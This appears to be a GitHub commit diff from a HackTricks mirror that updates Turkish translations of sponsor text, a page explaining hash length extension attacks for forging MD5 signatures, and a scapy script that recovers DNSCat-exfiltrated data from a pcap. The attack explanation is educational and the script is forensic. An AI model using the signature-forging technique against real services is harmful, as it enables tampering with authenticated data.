mirror of
https://github.com/carlospolop/hacktricks
synced 2025-02-16 14:08:26 +00:00
Translated ['README.md', 'crypto-and-stego/hash-length-extension-attack.
This commit is contained in:
parent
f84f78d00d
commit
f6cbf29df3
35 changed files with 1061 additions and 995 deletions
36
README.md
36
README.md
|
@ -5,7 +5,7 @@
|
|||
_Hacktricks logos & motion design by_ [_@ppiernacho_](https://www.instagram.com/ppieranacho/)_._
|
||||
|
||||
{% hint style="success" %}
|
||||
**Wiki'ye hoş geldiniz, burada CTF'lerden, gerçek uygulamalardan, araştırmalardan ve haberlerden öğrendiğim her hackleme hilesini/teknikleri/bilgiyi bulacaksınız.**
|
||||
**Bu wiki'ye hoş geldiniz, burada CTF'lerden, gerçek uygulamalardan, araştırmalardan ve haberlerden öğrendiğim her hackleme hilesini/teknikleri/bilgiyi bulacaksınız.**
|
||||
{% endhint %}
|
||||
|
||||
Başlamak için, bir veya daha fazla **makineyi pentest ettiğinizde izlemeniz gereken tipik akışı** bulacağınız bu sayfayı takip edin:
|
||||
|
@ -20,7 +20,7 @@ Başlamak için, bir veya daha fazla **makineyi pentest ettiğinizde izlemeniz g
|
|||
|
||||
<figure><img src=".gitbook/assets/stm (1).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**STM Cyber**](https://www.stmcyber.com), sloganı **HACK THE UNHACKABLE** olan harika bir siber güvenlik şirketidir. Kendi araştırmalarını yapar ve kendi hackleme araçlarını geliştirirler ve pentesting, Kırmızı Takımlar ve eğitim gibi birçok değerli siber güvenlik hizmeti sunarlar.
|
||||
[**STM Cyber**](https://www.stmcyber.com), sloganı **HACK THE UNHACKABLE** olan harika bir siber güvenlik şirketidir. Kendi araştırmalarını yapar ve kendi hackleme araçlarını geliştirirler ve pentesting, Kırmızı Takımlar ve eğitim gibi çeşitli değerli siber güvenlik hizmetleri sunarlar.
|
||||
|
||||
Bloglarını [**https://blog.stmcyber.com**](https://blog.stmcyber.com) adresinden kontrol edebilirsiniz.
|
||||
|
||||
|
@ -32,7 +32,7 @@ Bloglarını [**https://blog.stmcyber.com**](https://blog.stmcyber.com) adresind
|
|||
|
||||
<figure><img src=".gitbook/assets/image (42).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**RootedCON**](https://www.rootedcon.com), İspanya'daki en ilgili siber güvenlik etkinliği ve Avrupa'daki en önemlilerden biridir. Teknik bilgiyi teşvik etme misyonuyla, bu kongre, teknoloji ve siber güvenlik profesyonelleri için bir buluşma noktasıdır.
|
||||
[**RootedCON**](https://www.rootedcon.com), İspanya'daki en ilgili siber güvenlik etkinliği ve Avrupa'daki en önemlilerden biridir. Teknik bilgiyi teşvik etme misyonuyla, bu kongre, teknoloji ve siber güvenlik profesyonellerinin her disiplinde kaynayan bir buluşma noktasıdır.
|
||||
|
||||
{% embed url="https://www.rootedcon.com/" %}
|
||||
|
||||
|
@ -71,9 +71,9 @@ Deneyimli hackerlar ve ödül avcıları ile iletişim kurmak için [**HackenPro
|
|||
|
||||
* **Hacking Insights:** Hackleme heyecanını ve zorluklarını inceleyen içeriklerle etkileşime girin
|
||||
* **Gerçek Zamanlı Hack Haberleri:** Hızlı tempolu hackleme dünyasında gerçek zamanlı haberler ve içgörülerle güncel kalın
|
||||
* **En Son Duyurular:** Yeni ödül avcılıklarını başlatan ve önemli platform güncellemelerini içeren en yeni duyurularla bilgilenin
|
||||
* **En Son Duyurular:** Yeni ödül avcılıklarının başlatılması ve önemli platform güncellemeleri hakkında bilgi sahibi olun
|
||||
|
||||
Bugün [**Discord**](https://discord.com/invite/N3FrSbmwdy) adresinde bize katılın ve bugün en iyi hackerlarla işbirliği yapmaya başlayın!
|
||||
Bugün [**Discord**](https://discord.com/invite/N3FrSbmwdy) adresinde bize katılın ve bugün en iyi hackerlarla işbirliğine başlayın!
|
||||
|
||||
***
|
||||
|
||||
|
@ -81,7 +81,7 @@ Bugün [**Discord**](https://discord.com/invite/N3FrSbmwdy) adresinde bize katı
|
|||
|
||||
<figure><img src=".gitbook/assets/image (12).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
**Vulnerability assessment & penetration testing için anında kullanılabilir kurulum**. 20'den fazla araç ve özellikle tam bir pentest çalıştırın. Pentester'ları değiştirmiyoruz - onlara daha derinlemesine kazma, kabuklar patlatma ve eğlenme zamanı kazandırmak için özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
|
||||
**Vulnerability assessment & penetration testing için anında kullanılabilir kurulum**. 20'den fazla araç ve özellikle tam bir pentest çalıştırın, keşiften raporlamaya kadar. Pentester'ları değiştirmiyoruz - onlara daha derine inme, kabukları patlatma ve eğlenme zamanı kazandırmak için özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
|
||||
|
||||
{% embed url="https://pentest-tools.com/" %}
|
||||
|
||||
|
@ -97,7 +97,7 @@ SerpApi'nin planlarından birine abone olmak, Google, Bing, Baidu, Yahoo, Yandex
|
|||
Diğer sağlayıcılardan farklı olarak, **SerpApi sadece organik sonuçları kazımaz**. SerpApi yanıtları tutarlı bir şekilde tüm reklamları, iç içe resimleri ve videoları, bilgi grafiklerini ve arama sonuçlarında bulunan diğer unsurları ve özellikleri içerir.
|
||||
|
||||
Mevcut SerpApi müşterileri arasında **Apple, Shopify ve GrubHub** bulunmaktadır.\
|
||||
Daha fazla bilgi için [**bloglarına**](https://serpapi.com/blog/) göz atın veya [**oyun alanlarında**](https://serpapi.com/playground) bir örnek deneyin.\
|
||||
Daha fazla bilgi için [**bloglarını**](https://serpapi.com/blog/) kontrol edin veya [**oyun alanlarında**](https://serpapi.com/playground) bir örnek deneyin.\
|
||||
Ücretsiz bir hesap oluşturabilirsiniz [**buradan**](https://serpapi.com/users/sign\_up)**.**
|
||||
|
||||
***
|
||||
|
@ -114,24 +114,24 @@ Daha fazla bilgi için [**bloglarına**](https://serpapi.com/blog/) göz atın v
|
|||
|
||||
<figure><img src=".gitbook/assets/websec (1).svg" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WebSec**](https://websec.nl), modern bir yaklaşımla işletmeleri dünya çapında en son siber güvenlik tehditlerine karşı koruyan Amsterdam merkezli profesyonel bir siber güvenlik şirketidir.
|
||||
[**WebSec**](https://websec.nl), modern bir yaklaşımla işletmeleri dünya çapında en son siber güvenlik tehditlerine karşı korumaya yardımcı olan Amsterdam merkezli profesyonel bir siber güvenlik şirketidir.
|
||||
|
||||
WebSec, Pentesting, Güvenlik Denetimleri, Farkındalık Eğitimleri, Phishing Kampanyaları, Kod İncelemesi, Sızma Geliştirme, Güvenlik Uzmanları Dış Kaynak Kullanımı ve çok daha fazlasını sağlayarak **her şeyi yapan bir güvenlik şirketidir**.
|
||||
|
||||
WebSec hakkında başka harika bir şey de, endüstri ortalamasının aksine WebSec'in becerilerine çok güvendiği, web sitelerinde "**Eğer hackleyemezsek, ödemezsiniz!**" şeklinde belirtildiği. Daha fazla bilgi için [**web sitelerine**](https://websec.nl/en/) ve [**bloglarına**](https://websec.nl/blog/) göz atın!
|
||||
WebSec hakkında başka harika bir şey de, endüstri ortalamasının aksine WebSec'in becerilerine çok güvendiğidir, web sitelerinde "**Eğer hackleyemezsek, ödeme yapmazsınız!**" şeklinde belirtilmiştir. Daha fazla bilgi için [**web sitelerine**](https://websec.nl/en/) ve [**bloglarına**](https://websec.nl/blog/) göz atın!
|
||||
|
||||
Yukarıdakilere ek olarak, WebSec aynı zamanda HackTricks'in kararlı destekçisidir.
|
||||
|
||||
{% embed url="https://www.youtube.com/watch?v=Zq2JycGDCPM" %}
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize** edilip edilmediğini kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
[**WhiteIntel**](https://whiteintel.io), şirketleri veya müşterilerini **hırsız** kötü amaçlı yazılımlar tarafından **tehlikeye atılıp atılmadığını** kontrol etmek için **ücretsiz** işlevler sunan **dark-web** destekli bir arama motorudur.
|
||||
|
||||
WhiteIntel'in temel amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret ederek ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
|
@ -145,14 +145,14 @@ Onları kontrol et:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>**Sıfırdan Kahraman'a AWS hackleme öğrenin**</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'i desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)'yi keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuzu
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)'da **takip edin**.
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks ve HackTricks Cloud** github depolarına PR'lar göndererek **paylaşın**.
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katılın.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,24 +1,24 @@
|
|||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **dark web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -28,28 +28,28 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
# Saldırının Özeti
|
||||
|
||||
Bir sunucuyu hayal edin ki **bazı verileri** **imzalıyor** ve ardından bu verilere **belli bir açık metin verisine bir sır ekleyerek** ve ardından bu veriyi karma işlemine tabi tutarak. Eğer şunları biliyorsanız:
|
||||
Bir sunucuyu hayal edin ki **bazı bilgileri** **imzalıyor** ve ardından bu verilere bilinen açık metin verilerine bir **gizli** ekleyerek veriyi karmaşık hale getiriyor. Eğer şunları biliyorsanız:
|
||||
|
||||
* **Sırrın uzunluğu** (bu aynı zamanda belirli bir uzunluk aralığından kaba kuvvet saldırısıyla da bulunabilir)
|
||||
* **Gizli bilginin uzunluğu** (bu aynı zamanda belirli bir uzunluk aralığından kaba kuvvet saldırısıyla da bulunabilir)
|
||||
* **Açık metin verisi**
|
||||
* **Algoritma (ve bu saldırıya karşı savunmasız)**
|
||||
* **Algoritma (ve bu saldırıya karşı savunmasızdır)**
|
||||
* **Dolgu biliniyor**
|
||||
* Genellikle varsayılan bir tane kullanılır, bu yüzden diğer 3 gereklilik karşılanıyorsa, bu da karşılanır
|
||||
* Dolgu, sırrın veriye olan uzunluğuna bağlı olarak değişir, bu yüzden sırrın uzunluğuna ihtiyaç vardır
|
||||
* Dolgu, gizli+veri uzunluğuna bağlı olarak değişir, bu yüzden gizli bilginin uzunluğuna ihtiyaç vardır
|
||||
|
||||
O zaman, bir **saldırganın** **veri ekleyebilmesi** ve **önceki veri + eklenen veri** için geçerli bir **imza oluşturabilmesi** mümkündür.
|
||||
|
||||
## Nasıl?
|
||||
|
||||
Temelde savunmasız algoritmalar, öncelikle bir **veri bloğunu karma işlemine tabi tutarak** karma değerlerini oluşturur ve ardından, **önceki** oluşturulan **karma** (durum) **veriden sonraki veri bloğunu ekler ve onu karmaya tabi tutar**.
|
||||
Temelde savunmasız algoritmalar, öncelikle bir **veri bloğunu karmaşık hale getirerek** karma oluşturur ve ardından, **önceki** oluşturulan **karmadan** (durumdan) **sonraki veri bloğunu ekler** ve **karma oluşturur**.
|
||||
|
||||
Sonra, sırrın "gizli" ve verinin "veri" olduğunu hayal edin, "gizliveri"nin MD5'i 6036708eba0d11f6ef52ad44e8b74d5b'dir.\
|
||||
Bir saldırgan "ekle" dizesini eklemek isterse:
|
||||
Dolayısıyla, gizli "gizli" ve veri "veri" ise, "gizliveri"nin MD5'i 6036708eba0d11f6ef52ad44e8b74d5b'dir.\
|
||||
Bir saldırgan "ekleme" dizesini eklemek isterse:
|
||||
|
||||
* 64 "A"nın MD5'ini oluşturur
|
||||
* Önceden başlatılmış karma durumunu 6036708eba0d11f6ef52ad44e8b74d5b yapar
|
||||
* "ekle" dizesini ekler
|
||||
* Karmayı bitirir ve sonuçta elde edilen karma, "gizli" + "veri" + "dolgu" + "ekle" için **geçerli** bir tane olacaktır**
|
||||
* Önceden başlatılmış karmayı 6036708eba0d11f6ef52ad44e8b74d5b yapar
|
||||
* "ekleme" dizesini ekler
|
||||
* Karma işlemini tamamlar ve sonuçta elde edilen karma, "gizli" + "veri" + "dolgu" + "ekleme" için **geçerli** bir tane olacaktır
|
||||
|
||||
## **Araç**
|
||||
|
||||
|
@ -59,13 +59,13 @@ Bir saldırgan "ekle" dizesini eklemek isterse:
|
|||
|
||||
Bu saldırının iyi açıklandığını bulabilirsiniz [https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks](https://blog.skullsecurity.org/2012/everything-you-need-to-know-about-hash-length-extension-attacks)
|
||||
|
||||
## WhiteIntel
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **dark-web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
[**WhiteIntel**](https://whiteintel.io), **dark web** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in asıl amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye saldırılarıyla mücadele etmektir.
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
|
@ -73,14 +73,14 @@ Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong> öğrenin!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARINI**](https://github.com/sponsors/carlospolop) kontrol edin!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**Resmi PEASS & HackTricks ürünlerini alın**](https://peass.creator-spring.com)
|
||||
* [**The PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Hacking püf noktalarınızı göndererek HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -4,18 +4,31 @@
|
|||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na (https://github.com/sponsors/carlospolop) göz atın!
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
Eğer **şifreleme kullanmadan DNSCat** ile **veri sızdırılan bir pcap**'iniz varsa, sızdırılan içeriği bulabilirsiniz.
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Sadece **ilk 9 baytın** gerçek veri olmadığını, ancak **C\&C iletişimiyle ilgili olduğunu** bilmelisiniz:
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
WhiteIntel'in başlıca amacı, bilgi çalan kötü amaçlı yazılımlardan kaynaklanan hesap ele geçirmeleri ve fidye yazılımı saldırılarıyla mücadele etmektir.
|
||||
|
||||
Websitesini ziyaret edebilir ve motorlarını **ücretsiz** deneyebilirsiniz:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
Eğer **şifreleme kullanmadan DNSCat** tarafından **dışarıya sızdırılan verileri içeren** bir pcap'iniz varsa, sızdırılan içeriği bulabilirsiniz.
|
||||
|
||||
Sadece **ilk 9 baytın** gerçek veri olmadığını, ancak **C\&C iletişimi** ile ilgili olduğunu bilmelisiniz:
|
||||
```python
|
||||
from scapy.all import rdpcap, DNSQR, DNSRR
|
||||
import struct
|
||||
|
@ -44,14 +57,14 @@ python3 dnscat_decoder.py sample.pcap bad_domain
|
|||
```
|
||||
<details>
|
||||
|
||||
<summary><strong>Sıfırdan Kahraman'a AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme konusunda</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> öğrenin!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
|
||||
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)** takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**'da takip edin.**
|
||||
* **Hacking püf noktalarınızı paylaşarak PR'ler göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
|
||||
</details>
|
||||
|
|
|
@ -1,26 +1,38 @@
|
|||
# Wireshark ipuçları
|
||||
|
||||
## Wireshark ipuçları
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>AWS hackleme konusunda sıfırdan kahramana kadar öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
|
||||
<summary><strong>Sıfırdan kahraman olmak için AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Kırmızı Takım Uzmanı)</strong></a><strong>!</strong></summary>
|
||||
|
||||
HackTricks'ı desteklemenin diğer yolları:
|
||||
|
||||
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünleri**]'ni edinin (https://peass.creator-spring.com)
|
||||
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**]'in koleksiyonu
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
|
||||
* **Hacking ipuçlarınızı paylaşarak PR'lar göndererek HackTricks** (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
|
||||
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
|
||||
* [**Resmi PEASS & HackTricks ürünleri**](https://peass.creator-spring.com) edinin
|
||||
* [**PEASS Ailesi'ni**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
|
||||
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'da takip edin.**
|
||||
* **Hacking ipuçlarınızı paylaşın, PR'lar göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına.
|
||||
|
||||
</details>
|
||||
|
||||
### [WhiteIntel](https://whiteintel.io)
|
||||
|
||||
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) **karanlık ağ** destekli bir arama motorudur ve şirketin veya müşterilerinin **hırsız kötü amaçlı yazılımlar** tarafından **kompromize edilip edilmediğini** kontrol etmek için **ücretsiz** işlevler sunar.
|
||||
|
||||
